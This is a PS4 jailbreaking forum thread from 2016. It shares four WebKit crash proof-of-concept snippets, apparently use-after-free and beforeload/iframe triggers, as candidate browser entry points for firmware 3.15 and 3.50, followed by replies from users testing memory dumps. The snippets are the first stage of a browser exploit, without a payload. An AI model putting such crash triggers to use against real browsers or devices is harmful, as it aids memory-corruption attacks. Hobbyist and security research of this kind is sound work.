Join Us and become a Member for a Verified Badge to access private areas with the latest PS4 PKGs.
PS4 Jailbreaking       Thread starter mcmrc1       Start date Apr 10, 2016 at 12:04 PM       150      
Status
Not open for further replies.
Following the recent PS4 Dlclose Exploit for 1.76 Firmware, today I'd like to share a talk between zecoxao and Zer0xFF on finding an entry point for testing with PS4 Firmware 3.15 and also 3.50.
@zecoxao seems to be working on an entry point for the PS4 3.15 FW and wants some testers :)
1. Entry point:
Code:
<iframe></iframe><object onbeforeload="crash()">
    <script>
    if (window.testRunner) {
        testRunner.dumpAsText();
        testRunner.waitUntilDone();
    }

    function crash() {
        document.getElementsByTagName("iframe")[0].contentWindow.scrollX;
        document.open();
    }

    document.body.offsetLeft;
    setTimeout(function() {
        document.close();
        document.body.innerHTML = 'PASS if not crashed.';
        testRunner.notifyDone();
    }, 1);
    </script>
2. Entry point:
Code:
<input id="t1" type="time">
    <script>
    var time1 = document.getElementById('t1');
    document.addEventListener('beforeload', function(event) {
        time1.value = time1.value ? '' : '23:59';
    }, true);

    if (window.testRunner) {
        testRunner.dumpAsText();
        testRunner.waitUntilDone();
    }
    setTimeout(function() {
        document.body.innerHTML = 'PASS if not crashed.';
        testRunner.notifyDone();
    }, 100);
    time1.focus();
    </script>
    <embed src="data:text/html,PASS"></embed>
Also the the source code from the Webkit from Sony ;)
3. Entry Point:
Code:
<script>
function inituaf() {
  for(var i=0; i<100; i++) {
    for(var j=0; j<32; j++) {
    }
  }
  try { CollectGarbage(); } catch(err) {
    try { window.gc(); } catch(err) {
      for(var i=0; i<100; i++) {
      }
    }
  }
}

function eventhandler2() {

  try { var00002 = document; } catch(err) { } //line 2
  try { var00003 = var00002; } catch(err) { } //line 3
  try { var00043 = 0; } catch(err) { } //line 45
  try { var00044 = var00003.getElementsByTagName("iframe")[var00043]; } catch(err) { } //line 46
  try { var00045 = var00044.contentWindow; } catch(err) { } //line 47
  try { var00063 = -1; } catch(err) { } //line 67
  try { var00064 = 0; } catch(err) { } //line 68
  try { var00045.scrollTo(var00063,var00064); } catch(err) { } //line 69
  try { var00002.write(); } catch(err) { } //line 185
}


</script>
><object onbeforeload="eventhandler2()"><iframe>
4. Entry Point:
Code:
<!DOCTYPE html>
<html>
<body>
<iframe></iframe>
<script>

var _gc;

function run()
{
    var iframe = document.getElementsByTagName('iframe')[0];
    iframe.contentDocument.documentElement.contentEditable = true;

    iframe.contentDocument.documentElement.addEventListener('focusout', function () {
        iframe.parentNode.removeChild(iframe);
    }, false);

    iframe.contentDocument.documentElement.focus();
}
document.addEventListener('DOMContentLoaded', run);
</script>
</body>
</html>
PS4 3.15 Firmware Entry Point.png
 

Comments

Are you using cturt opensdk? I'm almost certain it's required
So data isn't dumping from the system hmmm makes me think of communication bus error

It prob is. I've got them all thrown into a folder I use as I've been testing...who knows whats in there, but yes real weird. It will say:

Warning: addr not received
and then
Error: dump not received

This tells me it's at least communicating to it, but just not sure why it's not passing through
 
It prob is. I've got them all thrown into a folder I use as I've been testing...who knows whats in there, but yes real weird. It will say:

Warning: addr not received
and then
Error: dump not received

This tells me it's at least communicating to it, but just not sure why it's not passing through
Well I can tell you from looking at cturt code everything is bent to hell and same with the compilers now most benders follow specific rules and mine is never do this with compilers when loading to a system it throws the kernel out of whack and only specific files shod ever be bent
It prob is. I've got them all thrown into a folder I use as I've been testing...who knows whats in there, but yes real weird. It will say:

Warning: addr not received
and then
Error: dump not received

This tells me it's at least communicating to it, but just not sure why it's not passing through
Wait that's a call addr not received cuz it's incorrect so if it's calling an incorrect addr no data can be sent or received
 
I think your right. I'll try to see if I can tell where it's pulling from and change that.

Wish I could upload a video. I got the PS4 to beep at me everytime it loads a pic through the browser. Kind of funny, ha
 
I think your right. I'll try to see if I can tell where it's pulling from and change that.

Wish I could upload a video. I got the PS4 to beep at me everytime it loads a pic through the browser. Kind of funny, ha
Nice keep up the good work. You shod actualy see the toolchains used I'm going thro the src codes it's kinda interesting how they do this floating points are all done thro software now and set thro the toolchain.
 
Alright sounds good. Did they fix the WiFi bug on 3.50 I know it's on 3.15 that cod be useful if you can still access it that way to allow another backend

I've got a second PS4 running on 3.15fw that I could test with as well, but it's never been logged into PSN. So, to do anything with the browser you have to go the long way. This sucks, so shelved it for now and just working with 3.50. Shoot me a link on the Wifi bug so I can read about it, and I'll take a look to see if I can piggy back off this one. I could have worked on this stuff all day, knew I should have taken a sick day today. ha!
 
I've got a second PS4 running on 3.15fw that I could test with as well, but it's never been logged into PSN. So, to do anything with the browser you have to go the long way. This sucks, so shelved it for now and just working with 3.50. Shoot me a link on the Wifi bug so I can read about it, and I'll take a look to see if I can piggy back off this one. I could have worked on this stuff all day, knew I should have taken a sick day today. ha!
It's on here I will see if I can find it. I know you cod also use the tools I have aswel as they also gave without fpga and compilers and looks to use over network for various things but is based on bare metal
 
Status
Not open for further replies.
Back
Top